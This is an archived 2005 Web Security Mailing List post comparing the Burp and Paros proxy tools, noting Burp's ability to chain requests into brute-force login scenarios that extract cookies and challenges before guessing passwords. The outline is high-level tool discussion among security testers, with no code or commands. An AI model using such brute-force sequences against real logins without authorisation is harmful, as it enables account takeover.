[WEB SECURITY] enumerating all GET and POST params

Thierry Zoller Thierry at Zoller.lu
Thu Dec 8 13:42:44 EST 2005


Dear Prasad Shenoy,

PS> Burp proxy seems to exhibit same features as Paros. You can toggle the
PS> "Intercept On/Off" feature to capture the request/responses plus you can
PS> also device filters to capture specific requests or responses based on
PS> contents etc. There is a "history" tab that provides you with a history
PS> of requests and corresponding responses and some additional info as well
PS> for a particular session.

Creates complex brute force scenarios :
get index page THEN
extract cookie value
extract challenge
THEN replace username
BRUTE FORCE password
etc

I have not seen this in paros, then there is the spider mode etc etc
etc. The problem with burp is that you really need to get your hands
on it a few times to see it's potential. Paros is a nice tool to have
to, I am not saying this one is better than this one, I am saying
: there are other tools

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list